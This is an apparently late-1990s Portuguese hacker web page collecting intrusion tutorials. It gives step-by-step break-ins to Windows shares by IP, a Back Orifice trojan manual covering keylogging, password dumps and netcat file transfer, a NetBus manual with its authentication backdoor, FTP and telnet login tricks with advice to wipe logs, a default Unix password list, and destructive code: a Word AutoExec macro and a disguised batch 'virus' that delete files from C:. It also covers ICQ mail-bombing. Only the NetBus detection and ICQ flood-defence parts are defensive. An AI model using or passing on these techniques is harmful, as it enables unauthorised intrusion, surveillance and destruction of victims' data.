Textos Hackers

 

Emuladores Roms Mp3 Jogos Seriais Textos Hack Textos Phreack Prog. Hacker Themes Piadas Webmaster Links

Olha a Sua HD Akí!!!!


' ') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('


Seu drive de CD-ROM

' ') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('


Seu drive de Diskette A:

') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('') document.write('


 

 

 

Invasão por IP
 

Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas".
Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção.
            Conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão.
            Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os    através do Painel de Controle, no ícone Redes.
            Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP.     Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do     Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize  204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples,utilizando-se atá mesmo o Bloco de Notas do     Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivoque ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS.Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.
 

*******************************************************************************************************************************************
 

Manual do Back Orifice
 
 
 

O Back Orifice é um aplicativo cliente/servidor que permite ao cliente monitorar, administrar e realizar outras ações de rede e multimídia na  máquina rodando o servidor. Para se comunicar com o servidor, o cliente (modo texto ou gráfico) pode ser executado a partir de qualquer máquina baseada em Microsoft Windows. O servidor atualmente só roda em Windows 95/98.
 
 

O pacote bo120.zip contém:

bo.txt Este documento.

plugin.txt A ajuda para programação de plugin.

boserve.exe O auto-instalador do Back Orifice (BO).

bogui.exe  O cliente modo gráfico (GUI) do Back Orifice.

boclient.exe O cliente modo texto do Back Orifice.

boconfig.exe Utilitário de configuração de nome do executável, porta, senha e plugins do servidor BO.

melt.exe Descompacta arquivos compactados com o comando "freeze".

freeze.exe Compacta arquivos que podem ser descompactados com o comando "melt".
 
 

Para instalar o servidor, é necessário apenas executá-lo. Quando o servidor é   executado, ele se instala e se apaga. Uma vez instalado em uma máquina, ele iniciará sempre que a máquina iniciar. Para atualizar uma cópia do Back Orifice remotamente, faça upload da nova versão do servidor para a máquina remota, e use o comando "Process spawn" para executá- la. Quando executado, o servidor irá automaticamente se instalar no lugar da antiga versão, se apagando após a operação. Antes da instalação, vários aspectos do servidor podem ser configurados com o   utilitário "boconfig": o nome do arquivo em que o Back Orifice se instalará, a  porta em que o servidor pode ser acessado e a senha de acesso. Se o servidor  não for configurado, ele será acessado na porta 31337, sem senha e se instalando  como " .exe" (espaço ponto exe).

O cliente se comunica com o servidor através de pacotes UDP encriptados. Para que se comuniquem, o cliente deve enviar os pacotes para mesma porta que o  servidor estiver recebendo, e a senha do cliente deve coincidir com a senha do  servidor.

A porta na qual o cliente envia os pacotes pode ser configurada através do parâmetro -p (GUI ou modo texto). Se o acesso estiver sendo filtrado ou um "Firewall" estiver rodando, pode ser necessário enviá-los por uma porta  específica, que não esteja sendo filtrada ou bloqueada.

O servidor realiza ações através do envio de comandos do cliente para um   endereço IP específico. Se a máquina servidor não estiver sob um endereço estático, ela pode ser localizada utilizando-se os comandos de varredura "sweep"  ou "sweeplist" do cliente modo texto, e no GUI através do comando "Ping..." ou  entrando-se com um IP na forma "1.2.3.*".

Os comandos atualmente incorporados ao Back Orifice estão listados abaixo Alguns dos nomes diferem entre o GUI e o modo texto, mas a sintaxe é a mesma para a maioria dos comandos. Mais informações sobre qualquer dos comandos podem ser exibidas através do cliente modo texto digitando-se "help command". O cliente GUI usa os dois campos de parâmetro para descrever as variáveis requeridas por cada comando selecionado da lista "Command". Se parte da  informação requerida pelo comando não for fornecida, o erro "Missing data" será  enviado pelo servidor.

Os comandos do Back Orifice são:











(gui/comando texto)

App add/appadd -Abre e redireciona um aplicativo modo texto para uma porta tcp. Isso permite que você controle o aplicativo modo texto ou modo dos (como command.com) via telnet.

App del/appdel Desliga o redirecionamento de um aplicativo.

Apps list/applist Lista os aplicativos atualmente conectados.

Directory create/md Cria diretório.

Directory list/dir Lista arquivos e diretórios. Você deve especificar um curinga caso queira que mais de um arquivo seja listado.

Directory remove/rd Remove um diretório.

Export add/shareadd Compartilha um diretório ou drive do servidor em rede. O ícone diretório ou  drive compartilhado não é alterado.

Export delete/sharedel Remove um compartilhamento.

Exports list/sharelist Lista os compartilhamentos, o drive ou diretório que está sendo compartilhado,  os acessos e a senha do compartilhamento.

File copy/copy Copia um arquivo.

File delete/del Remove um arquivo.

File find/find Procura no diretório arquivos que coincidam com a especificação curinga.

File freeze/freeze Compacta um arquivo.

File melt/melt Descompacta um arquivo.

File view/view Visualiza o conteúdo de um documento texto.

HTTP Disable/httpoff Desabilita o servidor http.

HTTP Enable/httpon Habilita o servidor http.

Keylog begin/keylog Registra o texto digitado no servidor em um arquivo texto. O log mostra o nome  da janela em que o texto foi digitado.
 
 

Keylog end Interrompe o registro de texto digitado. Para utilizar esse comando no modo   texto, use o comando "keylog stop".

MM Capture avi/capavi Captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.

MM Capture frame/capframe Captura um quadro de vídeo de um dispositivo de captura de vídeo para um arquivo  bitmap.

MM Capture screen/capscreen Captura uma imagem da tela do servidor para um arquivo bitmap.

MM List capture devices/listcaps Lista os dispositivos de captura de vídeo.

MM Play sound/sound

Toca um arquivo wav no servidor.

Net connections/netlist

Lista as conexões de entrada e saída da rede.

Net delete/netdisconnect

Desconecta o servidor de uma rede.

Net use/netconnect

Conecta o servidor em uma rede.

Net view/netview

Lista todas as interfaces de rede, domínios, servidores e envios do servidor.

Ping host/ping

Testa a conexão com a máquina remota. Informa o nome da máquina e a versão do

BO.

Plugin execute/pluginexec

Executa um plugin do Back Orifice. Executar funções não entendidas pelo plugin

pode fazer com que o servidor trave.

Plugin kill/pluginkill

Desliga um plugin.

Plugins list/pluginlist

Lista plugins ativos ou avisa de que um plugin foi desligado.

Process kill/prockill

Termina um processo.

Process list/proclist

Lista processos rodando.

Process spawn/procspawn

Abre um programa. Pelo GUI, se o segundo parâmetro é especificado, o processo

será executado normalmente e visível. Caso contrário ele será executado de

maneira invisível.

Redir add/rediradd

Redireciona recebimento de conexões tcp ou pacotes udp para outro endereço ip.

Redir del/redirdel

Interrompe o redirecionamento de uma porta.

Redir list/redirlist

Lista os redirecionamentos de portas ativos.

Reg create key/regmakekey

Cria uma chave no registro.

NOTA: Para todos os comandos de registro, não especificar a \\ inicial de

valores de registro.

Reg delete key/regdelkey

Remove uma chave no registro.

Reg delete value/regdelval

Remove um valor no registro.

Reg list keys/reglistkeys

Lista as sub-chaves de uma chave de registro.

Reg list values/reglistvals

Lista os valores de uma chave de registro.

Reg set value/regsetval

Define um valor para uma chave de registro. Os valores são especificados no

formato tipo vírgula valor. Para valores binários (tipo B) o valor é um série

de dois dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um número

decimal. Para valores string (tipo S) o valor é uma string de texto.

Resolve host/resolve

Determina o endereço ip de uma máquina em relação à máquina servidor. O nome da

máquina pode ser um "host name" ou o nome de uma máquina em rede local.

System dialogbox/dialog

Cria uma caixa de diálogo no servidor com o texto informado e um botão "ok".

Você pode criar quantas caixas de diálogo quiser, elas aparecerão em cascata

umas sobre as outras.

System info/info

Exibe as informações do sistema da máquina servidor. Os dados exibidos incluem

nome da máquina, usuário, tipo de cpu, memória total e disponível, dados sobre a

versão de Windows e informações sobre os drives, incluindo tipo (fixo, cd-rom,

removível ou remoto) e, nos drives fixos, o tamanho e espaço disponível do

drive.

System lockup/lockup

Trava a máquina servidor.

System passwords/passes

Exibe as senhas cacheadas e a senha do protetor de tela. As senhas podem

apresentar caracteres estranhos no fim.

System reboot/reboot

Desliga o servidor e reinicia a máquina.

TCP file receive/tcprecv

Conecta o servidor a um ip e porta específicos e grava qualquer dado recebido

por aquela conexão em um arquivo.

TCP file send/tcpsend

Conecta o servidor a um ip e porta específicos, envia o conteúdo do arquivo

especificado e o desconecta.

Arquivos podem ser transferidos _do_ servidor usando-se o comando "tcp file

send" e o utilitário netcat com os parâmetros:

netcat -l -p 666 > arquivo

Arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file

receive" e o utilitário netcat com os parâmetros:

netcat -l -p 666 < arquivo

NOTA: A versão para Windows do netcat não desconcerta nem se finaliza quando

atinge o final da transmissão. Após o término, finalize o netcat com ctrl+c ou

ctrl+break.
 
 

BOConfig:

BOconfig.exe permite configurar as opções de um boserve.exe antes que ele seja

instalado. Ele requisitará:

Runtime executable name

O nome do arquivo que o Back Orifice se instalará no diretório system do

Windows. O nome não precisa tem a extensão exe, ela será automaticamente

adicionada.

Exe description in registry

A descrição do executável do Back Orifice no registro do Windows, de onde ele

será executado sempre que o Windows se iniciar.

Server port

A porta em que o servidor será acessado.

Encryption password

A senha de acesso ao servidor. Não é obrigatória e pode ser deixada em

branco.

Default plugin to run on startup

O plugin do Back Orifice a ser executado ao iniciar.

File to attach

Arquivo a ser anexado ao boserve.exe. Ele pode ser um plugin, que será

automaticamente iniciado com o boserve.exe.

NOTA: Se o servidor não for configurado com o BOconfig.exe, ele se comunicará na

porta 31337 sem senha, e se instalará como " .exe"
 

*******************************************************************************************************************************************
 

Manual do Netbus
 

1. Introdução

Semelhante ao Back Orifice, o NetBus é uma ferramenta que pode ser utilizada como um sistema de administração remota para os ambientes

operacionais Windows 95, Windows 98 e Windows NT.

É composto por um programa que atua como Servidor e um programa que atua como Cliente, permitindo conexões remotas mesmo através da Internet, utilizando-se do protocolo TCP.
 
 

Por suas inúmeras características e facilidades, o NetBus passou a ser utilizado principalmente por hackers que pretendem manter controle sobre

as máquinas de suas vitimas, sem serem notados/detectados.
 
 
 
 

2. Comprometimento

O Servidor NetBus é auto-instalável indicando que na primeirá execução

a maquina passará a ser comprometida.
 
 

O NetBus permite um amplo controle sobre o Servidor, apresentando

inúmeras características das quais se destacam:

- Auto-instalável

- Auto executável (com o boot do Windows)

- Permite iniciar/executar qualquer aplicativo

- Permite fechar/terminar qualquer aplicativo

- Permite rebootar o servidor

- Pode desconectar usuários

- Permite enviar caracteres para aplicativos ativos

- Permite capturar o que esta sendo digitado no computador servidor

- Permite capturar a tela (screenshot) do computador servidor

- Retorna informações gerais sobre o computador

- Permite realizar upload de arquivos para o servidor

- Permite realizar download e deleções de qualquer arquivo do servidor

- Permite capturar o som de microfones instalados no servidor

- Possui esquemas de proteção e validação de acessos através de senhas

- Não aparece na Task List do Windows
 
 

Além disso, o NetBus faz uso de senhas para permitir o controle de acessos ao Servidor NetBus. A string que contém a senha que o Cliente

envia para o Servidor é semelhante à linha abaixo:

Password;0;my_password
 
 

No entanto, detectou-se a presença de um backdoor no NetBus que permite a qualquer Cliente estabelecer conexão com o Servidor sem a necessidade de se utilizar uma senha. O Cliente pode conectar-se sem autenticação bastando substituir o valor do segundo parâmetro da string de conexão acima de "0" para "1".
 
 
 
 

3. Detecção
 
 

Por default, o Servidor NetBus chama-se Patch.exe. No entanto pode perfeitamente ser renomeado para qualquer outro nome.
 
 

O NetBus utiliza TCP para estabelecer o envio/recebimento de pacotes e dados, permanecendo ativo nas portas 12345 e 12346 aguardando por

conexões de clientes.
 
 

Como primeiro passo, é possível verificar se essas portas estão em uso por algum serviço. Para tanto utiliza-se o comando 'netstat' conforme

exemplo abaixo:
 
 

c:\>netstat -an | find "1234"

TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
 
 

Em seguida, é possível identificar que serviço esta ativo na porta apresentada pelo netstat. Para tanto utiliza-se o comando telnet,

conforme exemplo abaixo:
 
 

c:\>telnet 127.0.0.1 12345

Se o NetBus estiver instalado e aguardando por conexões nesta porta, a

seqüência abaixo irá aparecer na janela do telnet:
 
 

'NetBus 1.53'
 
 

Ou:

'NetBus 1.60'
 
 

Alem desse procedimento, é possível examinar o registro do Windows a procura de algumas chaves que podem ser criadas pelo programa quando de sua instalação. Execute o 'regedit' e faca uma busca pelas chaves abaixo:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome do NetBus]

HKEY_CURRENT_USER\Patch\Settings\ServerPwd
 
 

A primeirá chave indica que o NetBus esta configurado para ser   inicializado automaticamente a cada boot do sistema. Já a segunda chave

indica qual a senha (em formato texto puro) que esta sendo utilizada para validar conexões.
 
 

4. Removendo o NetBus

Indica-se dois procedimentos básicos e simples para remoção do NetBus:

1) fazer uso de uma opção do Servidor NetBus que automaticamente deleta

o executável, conforme exemplo abaixo:

c:\>nome_do_netbus_server.exe /remove

2) utilizar o Cliente do NetBus para fazer essa remoção. Basta conectar-se ao Servidor (podendo ser localhost), selecionar "Server admin"

e em seguida "Remove server".

No entanto, notamos que em alguns casos as duas opções falharam ao limpar o registro do Windows. Logo, indicamos que o processo de remoção seja feito manualmente deletando-se o executável e limpando-se o registro eliminando-se as chaves criadas pelo NetBus.
 

*******************************************************************************************************************************************
 

FTP

Para Hackear em FTP, Primeiro vc deve saber o indereço do Host ou seu IP, para isto use o IPSCAN, digitando o IP Principal do Host:
Lista de Alguns FTP's

ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br
ftp.netscape.com
ftp.angelfire.com
 

Let's HaCk !!!

Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.
 Ao conectar ele pedirá a senha e o Password, tente user os passwords UNIX, se não der vc deve entrar INVISIVEL!!

Como entrar Invisivel?

No login precione ENTER, no password precione Novamente... Ira aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , precione ENTER e digite:

quote cwd ~root

Precione ENTER novamente e digite:

quote pass ftp
 

Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly,
vc não esta Hackeando.., pois esta aplicada a proteção, para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....

Meu Deus...eu entrei e agora o quê eo faço?

Ao entrar vc vai estar no Diretorio do login, tipo \home\root\,

Dai, para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir é um usuario,... não tentem pegar as senhas , pois são Cryptografadas...
Pois a maioria dos users usa a mesma senha login....

Não responsabilizamos por atos cometidos nos Hosts... o problema é de quem HaCkEiA, e não nosso,
 pois tome muito cuidado, e NUNCA, mas NUNCA apague NADA!!!
 
 

Invasão por FTP ( usando trojans )

1) O que é um FTP server?

 Um FTP server é um servidor de FTP, ou seja, um servidor de internet que
disponibiliza arquivos para serem acessados por um cliente de FTP.

2) Como se acessa um servidor FTP?

 Através de um cliente de FTP, como WS_FTP ou CuteFTP.  Pode-se também usar
um cliente de HTTP (navegador), como Netscape Navigator.

3) Como transformar o IP de uma vítima em um FTP server?

 Para que o IP da vítima se torne um servidor FTP é necessário que você
abra uma porta FTP na máquina da vítima.

4) Que trojans que permitem abrir uma porta FTP?

 Atualmente o Deep Throat 2.0 ou o 1.0 e o WinCrash permitem este tipo de acesso.  Os
outros trojans permitem diferentes tipos de acesso.

5) Que comandos nesses trojans devemos usar para abrir uma porta FTP?

5.1) No Deep Throat 1.0

 Para abrir um servidor FTP no DT 1.0 basta se usar o comando "Start/Stop
FTP Server", o que irá abrir um servidor de FTP na porta 21.

5.2) No Deep Throat 2.0

 Para abrir um servidor FTP no DT 2.0 basta se usar o comando "FTP Port", e
designar uma porta de 0001 a 9999.  Em seguida utilize o comando "FTP Server", que
irá iniciar o servidor de FTP.  Se não for designada uma porta, o servidor será
aberto na porta 41.

5.3) No WinCrash 1.03

 Para abrir um servidor FTP no WinCrash 1.3, utilize o comando "Open Server
Hard Disk" na guia "File Manager".  O servidor será aberto na porta 21.

6) Como proceder para invadir por FTP?

6.1) Por cliente de FTP

 Entre em "Host" com o IP do servidor, e em Port com a porta FTP.  Com isso
você acessará os drives da vítima normalmente.

6.2) Por cliente de HTTP

 Vá ao navegador e digite:

ftp://IP:PORTA

 onde

IP é o IP da vítima;

PORTA é a porta que foi aberta.

 Agora você terá à sua disposição os drives da vítima, que podem ser
explorados no navegador como um servidor FTP.

7) Quais as vantagens do FTP server sobre o HTTP server?

 O FTP server permite ao cliente, além do upload (envio) e download
(recebimento), excluir, renomear e criar arquivos e diretórios.
 
 

*******************************************************************************************************************************************
 
 

 Invasão por IP (2)
 
 

Passa-a-passo: 1º- Certifique-se de que você possui este programa nbstat:

2º- Vá ao Prompt do MS-DOS.

3º- Digite: nbtstat -a o IP do cara que você quer invadir

4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)

5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.

6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)

7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.

8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"

9º- Pronto! Você invadiu por IP!

10º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas do lammaH e se achar algo interessante pega para você. OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windows\sytem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir.
 

*******************************************************************************************************************************************

Telnet

Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se excutar programas e comandos em outra máquina, como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir deum menu de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é amais comun em servidores que permitem acesso público). O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que ocomputador ao qual você está conectado permitir que você faça. Ele também é muito usado por operadores de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores, está muito enganado; muitas vezes ele faz a manutenção de casa mesmo, via Telnet !) Programas para Telnet Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um (procure no diretório windows o programa Telnet.exe - deve estar lá !). Caso seu provedor não lhe forneça um programa para Telnet,você pode conseguir um clicando no endereço abaixo : CommNet (para Windows3.x) - Shareware NetTerm (para Windows 95) - Freeware NCSA Telnet (para DOS) ftp://ftp.ncsa.uiuc.edu/Telnet/DOS/tel2308b.zip Conectando-se via Telnet. Os passos que apresentamos aqui são para o programa que acompanha o windows 95, mas servemperfeitamente para outros programas, com algumas variações, que você pode perceber e contornar. Se vocêtem algum dos programas listados ao lado, leia isto primeiro e depois passe para a página específica desse programa. Inicie o programa Telnet.exe entre na HomePage de algum servidor (Tente: www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain). Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. mas para isso vc tem que descobrir quais são as senhas padrões para o administrador em cada sistema . Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair
 
 

*******************************************************************************************************************************************

Vírus macro

Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto.
Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens com usuarios pentelhos.
PS: Software/versao Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrao do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Niveis de sacanagem

Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... Não é mais brincadeira.

Primeiro voce precisa criar uma macro... siga os passos:

Entre no Word, feche a janela de documento, não deixe nenhum
documento aberto(ativo), clique em Arquivo(File) depois Macro,
coloque no nome da macro "AutoExec"(obrigatorio) esta macro é
inicializada toda vez que o Word for iniciado, depois clique em
'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e
cole a rotina que tem logo mais abaixo.

PS: existe outras formas/meios d criar uma macro, mas esta é mais
simples.

Nivel 1

O nivel 1 serve para voce se mostrar, falando que entende do Word
melhor do que ninguem. Cada vez que o usuario inicia o Word recebera
uma mensagem... de alerta ou qualquer outro coisa que sair da sua
mente. veja abaixo.

Sub MAIN
MsgBox "Voce vai morrer, estou atrás de voce, tome cuidado por
onde anda...", "Microsoft Word", 5
MsgBox "To falando a verdade", "FATAL ERROR", 16
MsgBox "DESGRÇADO", "Voce não passa de 24hs", 64
End Sub

Nivel 2

É para deixar o usuario irritadissimo. no corpo da macro cole este
texto abaixo:

Sub MAIN
ArquivoNovoPadrão
Inserir "Filho"
ArquivoNovoPadrão
Inserir "da"
ArquivoNovoPadrão
Inserir "Puta"
ArquivoNovoPadrão
Inserir "Filho da Puta "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "Filho da Puta voce vai morrer hoje "
End Sub

Nivel 3

Bom este nivel é pura sacanagem, com ele um simples clicar do
mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os
documentos, voce é quem sabe.

Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub

Lembre-se de que estes macros, sao gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao, entao se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.
*Não me responsabilizamos por qualquer ato seu*
 

*******************************************************************************************************************************************

Criando um Vírus

Para fazer, entre no Edit do DOS e crie um arquivo .bat e neste arquivo digite:

ECHO ECHO OFF ECHO Y | del c:\*.* cls ECHO já era otario!!! Seu c: nao existe mais!

Depois de digitar salve o arquivo e logo em seguida, você vai precisar de um compilador de arquivos de .bat para .exe porque no Edit, ele vai salvar o vírus como .bat !! Se o cara rodar o arquivo .bat, o vírus funciona do mesmo jeito mas se ele estiver em .exe você pode dar uma desculpa dizendo que é algum programa e quando o cara rodar, ele se fode !!!

Importante: Se o windows do cara for na versão em português, mude o "Y" para "S".

Descrição dos comandos:

ECHO OFF => Apaga as linhas do comando ECHO Y | del c:\*.* => Deleta o c:\*.* cls => Limpar ECHO já era otario!!! Seu c: nao existe mais! => Mensagem que vai aparecer quando ele rodar o arquivo...
 

*******************************************************************************************************************************************

Atacando o ICQ:
 
 

Usando seu mailbomber para bombear o ICQ : O icq permite que você possa mandar e-mails para outros usuários. Então vamos aproveitar disso para bombardear um outro usuário um mailbomb. O mailbomb manda diversas mensagens para o e-mail da vitima, isso é exatamente o que vamos fazer!! Enviar um monte de mensagens para o icq de um usuário. Tudo que você vai precisar é de um programa de mail bomb e o UIN ( n° do icq ) da vitima mas não é necessario que você tenha essa pessoa na sua lista. Coloque seu e-mail bomb para bombear... Isso é bem simples. "Uin da vítima@pager.mirabilis.com"

Exemplo: 123456@pager.mirabilis.com

O cara vai ser bombeado exatamente como faz um mail bomb !! Na verdade essa tecnica faz exatamente o que faz o "icq bomber" faz. Porém, talvez seja mais rápido... ( Bem melhor )

*******************************************************************************************************************************************

Proteção contra ataques do ICQ:
 
 

Uma das coisas mais úteis na internet talvez seja o icq. O programa é quase que fundamental. Um dos problemas do programa é você estar conversando na boa e de repente você recebe milhares de mensagens !! Isso é muita pentelhação, porém existem modos de se defender dos floods. Alguns desses modos você encontrará nesse texto abaixo.

Flooding :

O primeiro programa brasileiro a floodear um usuario usando o sistema random user do icq foi o flooder. Esse programa faz um ataque de cliente a cliente, ou seja, de você ao usuário a ser bombeado. Para isso ele terá que se conectar a uma porta do seu computador. A porta padrão do ICQ é a 1027. Na maioria das vezes ela está aberta e o usuário é bombeado a partir dela.

O que iremos fazer para nos defendermos dos ataques dos flooders é travar o acesso dessas portas. Para isso iremos usar uma firewall. Firewall (parede de fogo) é um programa que impede qualquer conecção com portas selecionadas.

Arranje a firewall e instale. Agora abra a firewall e vá na seção Rule list. E clique em add. Uma nova janela se abrirá, agora você tem que selecionar as portas que você deseja colocar a firewall.

Aqui vai como deverá ficar suas opções: (as opções com "º" são pra voce selecionar)

Visualização das configurações do programa:

ºAll IP adress

|--RULE TYPE--| |----LOCAL PORT SELECTION-----|

|Allow in| |all ports| |allow out| |single port| |ºdisallow in| |ºports from "1000" to "7000"| |disallow out|

---------------------------------------------------------------

|--PROTOCOL--| |----REMOTE PORT SELECTION----|

|ºtcp/ip| |all port| |udp| |single port| ---------- |ºports from "1000" to "7000"|

---------------------------------------------------------------

Visulização das configurações do programa :

Configure um novo rule list assim e pronto! Você não receberá mais aqueles montes de mensagens pentelhas do flooder e do ickiller!

Mail bombing :

Para se defender desse problema é muito fácil! O mailbombing de icq utiliza um sistema chamado mailexpress. Quando te bombardeiam, você recebe várias mensagens de e-mail de icq, então nós iremos cancelar o recebimento desse tipo de mensagens.

Para isso abra o ICQ, vá no menu e então em security & privacity.

Uma nova janela irá se abrir. Entre na seção de ignore list e selecione a opção: "Do not accept mailexpress messages". E salve as alterações.

Pronto! Você nunca mais será bombeado dessa maneira. Quando as pessoas irem em seu info, não aparecerá mas o seu IP.
 

*******************************************************************************************************************************************

Encontrando sistemas:
 
 

Encontrando o Sistema
1. Para encontrar um computador com o sistema, você deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar via Telnet ou outro sistema de interligação de computadores. War Dialer: VMB Hacker (40,7k)

Sistemas UNIX
 

2. Tentar entrar com os defaults
3. Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde.
Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo.

Login: ..Password:
root ....root
root ....system
sys .....sys
sys .....system
daemon ..daemon
uucp ....uucp
tty .....tty
test ....test
unix ....unix
unix ....test
bin .....bin
adm .....adm
adm .....admin
admin ...adm
admin ...admin
sysman ..sysman
sysman ..sys
sysman ..system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who .....who
learn ...learn
uuhost ..uuhost
guest ...guest
host ....host
nuucp ...nuucp
rje .....rje
games ...games
games ...player
sysop ...sysop
root ....sysop
demo ....demo
 
 
 

Ex.: fou:123abc45:6789:10:Ricardo
Gomes:/home/dir/fou:/bin/fou
Username: fou
Encrypted Password: 123abc45
User Number: 6789
Group Number: 10
Other Information: Ricardo Gomes
Home Directory: /home/dir/fou
Shell: /bin/fou
 
 

